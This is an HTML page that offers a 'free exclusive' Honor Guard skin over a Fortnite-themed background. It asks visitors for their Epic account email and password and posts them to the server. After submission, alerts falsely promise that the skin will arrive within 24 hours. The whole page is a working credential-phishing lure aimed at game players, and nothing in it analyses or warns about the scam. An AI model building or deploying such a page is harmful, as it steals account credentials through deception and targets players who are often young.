<!DOCTYPE html>
<html>
	<title>HONOR GUARD| FREE EXCLUSIVE SKIN</title>
	<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css" integrity="sha384-	9aIt2nRpC12Uk9gS9baDl411NQApFmC26EwAOH8WgZl5MYYxFfc+NcPb1dKGj7Sk" crossorigin="anonymous">
	<link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
	<style>
	.container{
	display:flex;
   	justify-content:center;
   	align-items:center;
   	height:100vh;
	}
		
	input {
		display: block;
		border-radius: 15px;
		width: 100;
		font-family: 'Roboto', sans-serif;
		color: blue;
		padding: 5px;
	}
		
	body {
		background: url('https://www.huaweicentral.com/wp-content/uploads/2019/05/honor-view-20-fortnite-guard-redeem-process-featured-1.jpg');
		background-repeat: no-repeat;
		background-size: cover;
		}
		
	</style>
	<body>
		<div class="container">
			<div class="Centerdive">
		<form action='/' method='POST'>
  <div class="form-group">
    <label for="exampleInputEmail1">Email address</label>
    <input type="email" class="form-control" id="exampleInputEmail1" aria-describedby="emailHelp" name='email'>
    <small id="emailHelp" class="form-text text-muted">Enter your epic account</small>
  </div>
  <div class="form-group">
    <label for="exampleInputPassword1">Password</label>
    <input type="password" class="form-control" id="exampleInputPassword1" name='password'>
  </div>
  <div class="form-group form-check">
  </div>
  <button type="submit" class="btn btn-primary" onclick='submitted()'>Submit</button>
</form>
		</div>
	</div>
		<script>
			function submitted(){
				alert("the Account is submitted");
				alert("the skin will be in the account within 24 hours");
			}
		</script>
	</body>
</html>